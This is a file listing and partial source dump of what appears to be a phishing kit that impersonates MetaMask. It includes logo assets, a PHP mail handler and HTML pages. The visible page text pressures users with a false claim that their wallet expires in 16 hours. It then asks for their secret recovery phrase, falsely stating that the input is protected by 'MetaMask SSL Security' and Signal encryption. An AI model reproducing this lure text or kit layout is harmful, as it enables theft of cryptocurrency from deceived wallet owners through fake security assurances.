├── backup.html ├── css ├── .gitignore ├── backup.css └── style.css ├── index.html ├── media ├── .gitignore ├── 5e6010110671f79d5c96adf9_open graph.png ├── MetaMask.svg ├── MetaMask_Fox.svg.png ├── metamask logo.png └── metamask.png └── php ├── .gitignore └── mail-handler.php /backup.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 |
27 | NEVER share your secret seed phrase AKA secret recovery phrase.
28 | This input is protected by MetaMask SSL Security
29 | by the same Signal encryption protocol that secures sensitive data before they leave your device.
30 |
26 | Dear MetaMasker, we would like to just quickly remind you 27 | that your 28 | Metamask wallet will expire in 16 hours. 29 |
30 |31 | Confirm that you use your MetaMask wallet. 32 |
33 |